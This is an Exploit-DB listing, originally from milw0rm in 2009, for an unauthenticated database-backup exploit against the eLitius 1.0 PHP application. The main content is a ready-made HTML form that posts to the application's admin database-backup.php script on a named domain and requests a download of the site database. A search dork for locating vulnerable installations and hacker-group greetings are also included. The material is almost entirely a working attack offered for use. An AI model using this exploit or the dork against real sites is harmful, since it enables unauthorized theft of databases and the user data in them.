eLitius 1.0 - Arbitrary Database Backup Exploit

2009-04-20T00:00:00
ID EDB-ID:8498
Type exploitdb
Reporter ThE g0bL!N
Modified 2009-04-20T00:00:00

Description

eLitius 1.0 Arbitrary Database Backup Exploit. Webapps exploit for php platform

                                        
                                             <title>  Powered By eLitius 1.0 Remote Database Backup </title>
<form action="http://esyndicat.org/admin/database-backup.php" method="post" name="adminForm">
  <table class="admintable">
  <tbody><tr>
   <td style="width: 40%;">
    <table class="adminform">
    <tbody>
    <tr>
     <th colspan="2">Backup MySQL Database</th>
    </tr>
    <tr>
     <td style="text-align: center;"><strong>Choose Operation:</strong></td>
    </tr>
    <tr>
     <td style="text-align: center;">
      <select name="db_op">
       
       <option value="data">Backup data only</option>
       
      </select></td>
    </tr>
    <tr>
     <td colspan="2"  style="text-align: center; width: 50%;">
      
      <input name="savetype" value="client" id="db_client" checked="checked" type="radio"/><label for="db_client">Save to your PC</label> 
      
     </td>
    </tr>
    <tr>
     <td style="padding: 10px 0; text-align: center;"><input type="submit" name="backup" value="Create Backup" /></td>
    <tr>
     <td colspan="2"> 
     </td>
    </tr>
    <tr>
     <td style="text-align: center;"></td>
    </tr>
    </tbody>
    </table>
   </td>
   <td valign="top" width="80%">
  <table class="adminform">
   <tbody>
<th colspan="2">Greets: Dos-Dz TeaM SnAkEs-TeaM H4ckF0rU TeaM  Team Sobh4n ALLAH</th>
    <tr>
</br>
    <th colspan="2">Dork: Powered By eLitius 1.0 </th></br></CENTER>
</br>
<center>Cod[3]d By ThE g0bL!N</center>
</br>
    </tr>
    <tr>

# milw0rm.com [2009-04-20]